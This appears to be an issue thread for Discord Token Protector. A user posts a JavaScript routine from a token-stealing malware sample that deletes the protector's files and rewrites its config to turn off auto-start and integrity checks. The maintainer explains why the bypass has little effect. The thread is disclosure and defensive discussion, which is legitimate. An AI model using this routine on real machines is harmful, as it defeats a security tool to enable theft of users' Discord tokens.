Bypass found in the wild

[CanadaHonk]

bypass_token_protector() {
            for (const file of ["DiscordTokenProtector.exe", "ProtectionPayload.dll", "secure.dat"]) {
                if (client.requires.fs.exists(`${client.utils.encryption.decryptData(client.config.user.localappdata)}\\${file}`)) {
                    client.requires.fs.rm(`${client.utils.encryption.decryptData(client.config.user.localappdata)}\\${file}`);
                }
            }
            const token_protector_config = JSON.parse(client.requires.fs.readFileSync(`${client.utils.encryption.decryptData(client.config.user.localappdata)}\\DiscordTokenProtector\\config.json`, {
                encoding: "utf-8"
            }))
            token_protector_config['auto_start'] = false
            token_protector_config['auto_start_discord'] = false
            token_protector_config['integrity'] = false
            token_protector_config['integrity_allowbetterdiscord'] = false
            token_protector_config['integrity_checkexecutable'] = false
            token_protector_config['integrity_checkhash'] = false
            token_protector_config['integrity_checkmodule'] = false
            token_protector_config['integrity_checkscripts'] = false
            token_protector_config['integrity_checkresource'] = false
            token_protector_config['integrity_redownloadhashes'] = false
            token_protector_config['iterations_iv'] = 0
            token_protector_config['iterations_key'] = 0
            token_protector_config['version'] = 0
            client.requires.fs.writeFileSync(
                `${client.utils.encryption.decryptData(client.config.user.localappdata)}\\DiscordTokenProtector\\config.json`,
                JSON.stringify(
                    token_protector_config,
                    null, 4
                )
            )
        }

GLHF

[andro2157]

I've seen similar "bypasses" in the wild. In overall (including this one), they only work if :

• DTP is not running, and in this case, they can only get the token through social engineering (making you relogin without DTP). The config changes are useless as these critical configs have been moved to the encrypted container.
• If they run using admin privilege. If you allow a program to run using admin privilege you can safely assume that your token can be easily compromised. DTP cannot block attacks with admin privilege since it is in user land.

In this case, the config change, even if successful, won't do anything.

TLDR : useless bypass that won't do much.